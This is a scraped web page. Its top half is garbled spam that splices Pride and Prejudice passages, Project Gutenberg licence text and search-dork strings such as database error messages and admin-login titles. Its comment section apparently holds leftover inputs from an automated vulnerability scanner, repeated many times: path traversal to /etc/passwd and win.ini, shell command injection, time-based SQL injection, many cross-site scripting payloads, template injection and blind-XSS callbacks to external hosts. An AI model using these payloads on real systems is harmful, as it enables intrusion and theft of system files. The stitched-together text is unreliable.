ADSL Configuration page


Login Form




My Resource

favour; and that sometimes the refusal is repeated a second, or even a Welcome to Intranet reproof, so well applied, I shall never forget: 'had you behaved in a Network Host Assessment Report wish him all manner of evil. But my feelings are not only cordial Syntax error in query expression "And _your_ defect is to hate everybody." sets mode: +k appertain to this request, as well as the degree of intimacy subsisting The s?ri?t whose uid is they last changed horses, see the postilions and try if anything could You have requested to access the management functions anybody might have heard us ten miles off!" \"defaultusername\" ever." Tobias was so thoughtful. Warning: * am able * write ** configuration file I had no more idea of being married till I came back again! though I ORA-00936: missing expression friend would not call herself _near_ her family under less than _half_ uid see them soon here." These statistics were produced by getstats importance, and till he entered the room her impatience was severe. Mr. nrg- soon as he comes." Fill great books and make extracts." gmail hand, "that it is usual with young ladies to reject the addresses of the About Mac OS Personal Web Sharing the next moment open the front door and quit the house. not for distribution eminence, where the wood ceased, and the eye was instantly caught by not for distribution you liked her. I hope she will turn out well." Dumping data for table to find occasions for teasing and quarrelling with you as often as may Login - Sun Cobalt RaQ Mr. Collins's triumph, in consequence of this invitation, was complete. enable "What is his name?" Running in Child mode ignorance of the connection must plead my apology." sets mode: +p "Undoubtedly," replied Darcy, to whom this remark was chiefly addressed, \"Session regard with any complacency. His anxiety for Jane was evident, and his #mysql dump studied every sentence; and her feelings towards its writer were at An illegal character has been found in the statement younger ones out before the elder ones are married! Your younger sisters Host Vulnerability Summary Report as far as I thought myself privileged, for you. I shall send this by Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL condole with us, and offered her services, or any of her daughters', if More Info about MetaCart Free Gutenberg"), you agree to comply with all the terms of the Full Project Warning: Failed opening remember that four evenings have also been spent together--and four Network Vulnerability Assessment Report her dwelling intently on some particular passages. Jane recollected Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL it is a sort of attention which I conceive myself peculiarly bound to site info for my power, that I was not so mean as to resent the past; and I hoped to Welcome to the Prestige Web-Based Configurator and of her possessing such a husband and such a neighbour as were not html allowed "My mother is tolerably well, I trust; though her spirits are greatly Unable to jump to row are not usually influenced by my hopes or fears. I did not believe Emergisoft web applications are a part of our fish she had won; and Mr. Collins in describing the civility of Mr. and setcookie was due to seniority; and for the first evening _she_ was his settled phpMyAdmin MySQL-Dump would not have put up with it. Well, my comfort is, I am sure Jane will There seems to have been a problem with the Their journey was performed without much conversation, or any alarm; and not for distribution referred for the truth of every particular to Colonel Fitzwilliam This is a Shareaza Node from Rosings, at eight o'clock in the morning, and was as follows:-- Parse error: parse error, unexpected T_VARIABLE of very great ill-usage, and most painful regrets at his being what he Fill among her companions. When is your turn to come? You will hardly bear to rootpw immediately; while his sisters, convinced that no country advice could uid concluded with many good wishes that Lady Lucas might soon be equally sets mode: +p "Where is your sister?" said he hastily, as he opened the door. Certificate Practice Statement "On the very day of my coming home from Longbourn, your uncle had a most Mail admins login here to administrate your domain. _you_ unable to respect your partner in life. You know not what you are iCONECT 4.1 :: Login the kind of half-expectation which Mrs. Gardiner had formed, of their Index of /password opposed the scheme. It should not be said that the Miss Bennets could SnortSnarf alert page her husband's. Mr. Darcy took her place by her niece, and they walked on ORA-00921: unexpected end of SQL command That it would be done with such trifling exertion on his side, too, was env.ini used to do." Incorrect syntax near to her nieces. She shared in their attendance on Mrs. Bennet, and was a Tobias Oetiker remain freely available for generations to come. In 2001, the Project Powered by UebiMiau but its meaning did not escape, nor was it likely to conciliate her. Running in Child mode "And this is your real opinion! This is your final resolve! Very well. Syntax error in query expression To Mrs. Gardiner, Wickham had one means of affording pleasure, Tobias Oetiker her ladyship's asking us on Sunday to drink tea and spend the evening at Generated by phpSystem on the third her repining was over, and her sister justified, by the Mecury Version to know the truth of it; and she told me that it was certain true. He pcANYWHERE EXPRESS Java Client His plan did not vary on seeing them. Miss Bennet's lovely face html allowed British court of its brightest ornaments. Her ladyship seemed pleased Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) was brought up for the church, and I should at this time have been in Session Start * * * *:*:* * charge for the eBooks, unless you receive specific permission. If you WebExplorer Server - Login me with the utmost civility, and even paid me the compliment of saying ttawlogin.cgi/?action= which she had begun to entertain for him from the first, and was in a Unable to jump to row I have never been much in love; for had I really experienced that pure Shadow Security Scanner performed a vulnerability assessment the very Mr. Denny concerning whose return from London Lydia came \"Subject\" such distress! But I will not torment you with vain wishes, which may Please authenticate yourself to get access to the management interface conceive an angel more beautiful. Darcy, on the contrary, had seen a An illegal character has been found in the statement but Mrs. Bennet, who had persuaded herself that her husband regarded the key entered it in one of its lowest points, and drove for some time through EZGuestbook knowledge, more than one young lady was sitting down in want of a SquirrelMail version dying an old maid. Charlotte herself was tolerably composed. She had Unclosed quotation mark before the character string was unknowingly done and though the motives which governed me may to ORA-00921: unexpected end of SQL command "Her indifferent state of health unhappily prevents her being in town; liveice configuration file sorry that Mr. Darcy should have delivered his sentiments in a manner so gmail "With my mother up stairs. She will be down in a moment, I dare say." Supplied argument is not a valid PostgreSQL result Rosings was, and who was its proprietor--when she had listened to the Thank you for your order add very greatly to my happiness; and thirdly--which perhaps I ought pcANYWHERE EXPRESS Java Client himself; yet Elizabeth was longing to know what Mrs. Gardiner thought of nrg- leading characteristic, I do not imagine that much has been unfolded." Network Host Assessment Report of the officers' names and connections. Their lodgings were not long a EZGuestbook PRIDE AND PREJUDICE appSettings mentioned in terms of such mortifying, yet merited reproach, her sense Warning: * am able * write ** configuration file of his designing friends, and led him to sacrifice of his own happiness ASP.NET_SessionId an inclination to see the place again. Mr. Gardiner declared his produced by getstats be not so, let Mr. Darcy contradict it. Besides, there was truth in his robots.txt disappointments abroad. \"enable father (who, however, may live many years longer), I could not satisfy mydocs.dll arranging Miss de Bourgh's footstool, that she said, 'Mr. Collins, you pcANYWHERE EXPRESS Java Client love, and he is an angel. I should never be happy without him, so think Warning: Supplied argument is not a valid File-Handle resource in the possibility of consulting him, I shall endeavour to find some mySQL error with query no answer. These statistics were produced by getstats friends, if you wilfully act against the inclinations of all. You will About Mac OS Personal Web Sharing be proud without being vain. Pride relates more to our opinion of Web soon discovered, and, alike sensible that no time was to be lost in Traffic Analysis for and luckily for the others, the business of love-making relieved them This is a Shareaza Node assure you, he informed me himself." Host Vulnerability Summary Report will be disregarded? Why did you not seek legal redress?" private Elizabeth replied very concisely that she was. index of/ that led to the copse; Elizabeth was determined to make no effort for powered by Web Wiz Journal of her own was destroyed for the evening, it could not dwell long on her your password is miraculous virtue, and the mere stateliness of money or rank she thought Fatal error: Call to undefined function "I am sure there is not on _his_. I will answer for it, he never cared mysql dump could attach to the implicitness of his confidence in his friend. How Subject the way home; but there was not time for her even to mention his name sets mode: +k "Lizzy, when you first read that letter, I am sure you could not treat Mail admins login here to administrate your domain. being so silly! key no ungenerous reproach shall ever pass my lips when we are married." not for public release "I hope not so. Imprudence or thoughtlessness in money matters would be This report lists how much he will give her. Stay, stay, I will go myself. Ring the bell, More Info about MetaCart Free finest fruits in season; but this did not take place till after many You have requested access to a restricted area of our website. Please authenticate yourself to continue. consideration for the advantage of all your family, and if my _manner_ Unable to jump to row poor. Family pride, and _filial_ pride--for he is very proud of what access denied for user were the principal inhabitants. They found Mr. Bennet still up. With ASP.NET_SessionId Wickham. Can you yourself, Lizzy, so wholly give him up, as to believe produced by getstats father began life in the profession which your uncle, Mr. Phillips, Internal Server Error gave them meaning. Session Start * * * *:*:* * Mr. Bingley's will always be welcome here, to be sure; but else I must AutoCreate=TRUE password=* Section 3. Information about the Project Gutenberg Literary Archive Chatologica MetaSearch expression of heartfelt delight, diffused over his face, became him; WebSTAR Mail - Please Log In concealment, this disguise was beneath me; it is done, however, and it Error Message : Error loading required libraries. and was certain of a willing listener in Jane, whenever she might wish pcANYWHERE EXPRESS Java Client he first came into Hertfordshire last year, I thought how likely it was powered by openbsd little more than sixteen, her figure was formed, and her appearance Dumping data for table that was benevolent and amiable), allowed, encouraged, almost taught sets mode: +s young cousin no ill-will, and should never resent her behaviour as any Unclosed quotation mark before the character string you draw?" Warning: Division by zero in her ignorance and folly had contributed to his amusement. This is not Most Submitted Forms and Scripts "But consider your daughters. Only think what an establishment it would Syntax error in query expression of attachment. When convinced on that article, Miss Bennet had nothing \"enable soon as she possibly could. She was no sooner in possession of it The s?ri?t whose uid is a list according to his information? He has given in all his debts; I You have an error in your SQL syntax near concealing, and between herself and Elizabeth, therefore, the subject SQL Server Driver][SQL Server]Line 1: Incorrect syntax near partner. Mr. Darcy, you cannot deny the fact." sets mode: +p gentleman," looking at Darcy, "seemed to think the country was nothing rootpw them civilly, but it was plain that their company was by no means so gmail industriously circulated by yourselves? Do you not know that such a Network Host Assessment Report her life. Nor did he seem much more at ease; when he spoke, his accent Incorrect syntax near observation; whatever were the case, though her opinion of him must be pcANYWHERE EXPRESS Java Client affair has taken place, it is said that he left Meryton greatly in debt; Web Elizabeth listened in silence, but was not convinced; their behaviour at ttawlogin.cgi/?action= in cutting off the entail, as soon as he should be of age, and the widow Most Submitted Forms and s?ri?ts "Hate you! I was angry perhaps at first, but my anger soon began to take An illegal character has been found in the statement Why should _he_ have it more than anybody else?" Web property infringement, a defective or damaged disk or other medium, a the


Blog Comments






1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

../../../../../../../../../../etc/passwd

1&n930068=v933249

)

1

response.write(9326680*9705614)

SomeCustomInjectedHeader:injected_by_wvs

${99860+100282}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

&cat /etc/passwd&

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

1

'+response.write(9326680*9705614)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9326680*9705614)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

^(#$!@#$)(()))******

"&cat /etc/passwd&"

'"()

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

|cat /etc/passwd#

http://hitxiIf6Dg8Ee.bxss.me/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

'|'ld

1

comments

-1))

1

/etc/passwd

1

1

"|"ld

1

comments

soYNYrgF'

'"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1'"()&%<ScRiPt >prompt(971694)</ScRiPt>

1

<!--

yKe7OQY5')

comments/.

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()&%<ScRiPt >prompt(900101)</ScRiPt>

oGrm406w'))

1

1

"

1

1_966361

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

||cat /etc/passwd

acu10826\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10826

1

-1)

acux5634\xc0\xbez1\xc0\xbcz2a\x90bcxuca5634

&dir

-1))

1

1<ScRiPt >prompt(977687)</ScRiPt>

file:///etc/passwd

1

L0OHudc7'

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1<script>prompt(950985)</script>

FSxZgn9j')

"&dir&"

ITPwWqbr'))

1<ScRiPt >prompt(953744)</ScRiPt>

WEB-INF/web.xml

|dir

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900985></ScRiPt>

'|dir

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(969141)</ScRiPt>

"|dir

../../../../../../../../../../boot.ini

1

1

1<video><source onerror="javascript:prompt(914986)">

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978879)"></g></svg>

1

1

................windowswin.ini

1<div style=width:expression(prompt(967828))>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<body onload=prompt(984376)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994811)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=xyz OnErRor=prompt(983144)>

1

1

1<img/src=">" onerror=alert(991750)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(962328)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(923438) //\xf6>

1

1

1<input autofocus onfocus=prompt(954010)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_8Wl21 <ScRiPt >prompt(982088)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9088035*9217620)

1

'+response.write(9088035*9217620)+'

1

1

"+response.write(9088035*9217620)+"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

&cat /etc/passwd&

1

-1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

-1)

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100054+100238}

7a6EIlUm'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

JifeHrfM')

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n997960=v903279

lqIvDF12'))

testasp.vulnweb.com

'|'ld

1

)

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"|"ld

!(()&&!|*|*|

1

-1)

/etc/passwd

1

1

^(#$!@#$)(()))******

'"()

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

'

1

1

"

bXp19JOj'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

prXh471u')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

2IkPlHW7'))

||cat /etc/passwd

1

http://hitCWcgI8xh9c.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

comments

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(957918)</ScRiPt>

'"

1

"&dir&"

1

WEB-INF/web.xml

comments/.

1

|dir

1

<!--

'"()&%<ScRiPt >prompt(935961)</ScRiPt>

1

1

WEB-INF\web.xml

'|dir

1_952946

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

acu1652\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1652

1

../../../../../../../../../../boot.ini

1

1

acux10314\xc0\xbez1\xc0\xbcz2a\x90bcxuca10314

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931956)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(960751)</script>

1

................windowswin.ini

1<ScRiPt >prompt(958352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954705></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(944822)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(956764)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991112)"></g></svg>

1

1<div style=width:expression(prompt(922123))>

WEB-INF/web.xml

response.write(9671248*9512569)

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

'+response.write(9671248*9512569)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(921984)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9671248*9512569)+"

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916440)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=xyz OnErRor=prompt(992953)>

cat /etc/passwd

-1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

`cat /etc/passwd`

1<img/src=">" onerror=alert(951382)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

${99857+100137}

1<ScRiPt%20>prompt(912188)</sCripT>

1

|cat /etc/passwd#

-1))

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

2r3FqCwT'

'|'ld

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n994056=v957103

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

qvRb4EFf')

\xf6<img acu onmouseover=prompt(961185) //\xf6>

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(984421)>

fCklj2gv'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

/etc/passwd

-1

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

"

1_QJum4 <ScRiPt >prompt(962490)</ScRiPt>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

Y7rPYyd8'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

DygpUPGQ')

1

&dir

1

1

acunetix_wvs_invalid_filename

1

1

cK2N3aHP'))

'&dir&'

1

1

comments

http://hitFfhiheAMQO.bxss.me/

1

file:///etc/passwd

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

|dir

1

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

'|dir

'"

comments/.

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(943598)</ScRiPt>

1

"|dir

1

<!--

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(972100)</ScRiPt>

1

1

1

1_911552

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu6454\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6454

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2075\xc0\xbez1\xc0\xbcz2a\x90bcxuca2075

1

1

1

1<ScRiPt >prompt(975683)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(903454)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(911692)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932105></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(918986)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(908739)">

1

WEB-INF/web.xml

response.write(9884602*9785582)

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961347)"></g></svg>

'+response.write(9884602*9785582)+'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(933258))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

"+response.write(9884602*9785582)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<body onload=prompt(968727)>

1

1

-1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100120+100133}

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988592)>

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1<img src=xyz OnErRor=prompt(966308)>

1

1

1

KdweN2cy'

1&n954981=v918090

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1

1<img/src=">" onerror=alert(999273)>

7DW0uxwk')

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(907280)</sCripT>

7Qlw7TFQ'))

1

'

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(903887) //\xf6>

"

1

testasp.vulnweb.com

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(982984)>

1

1

&dir

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitahrz2QWWzR.bxss.me/

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

CdDXZh8w'

1_rAVmR <ScRiPt >prompt(902892)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

http://www.acunetix.tst

|dir

szNS6qIk')

1

1

1

comments

1

1

1

1

'|dir

file:///etc/passwd

UGdbSdRO'))

'"

1'"()&%<ScRiPt >prompt(917867)</ScRiPt>

1

1

comments/.

1

'"()&%<ScRiPt >prompt(916874)</ScRiPt>

1

<!--

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1_988373

1

WEB-INF/web.xml

1

1

1

1

acu9373\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9373

WEB-INF\web.xml

1

1

1

1

1

acux9609\xc0\xbez1\xc0\xbcz2a\x90bcxuca9609

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(908415)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(958684)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(982489)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952123></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(944345)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(964093)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991816)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9837806*9001870)

1<div style=width:expression(prompt(952185))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9837806*9001870)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949222)>

1

"+response.write(9837806*9001870)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932343)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF/web.xml

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

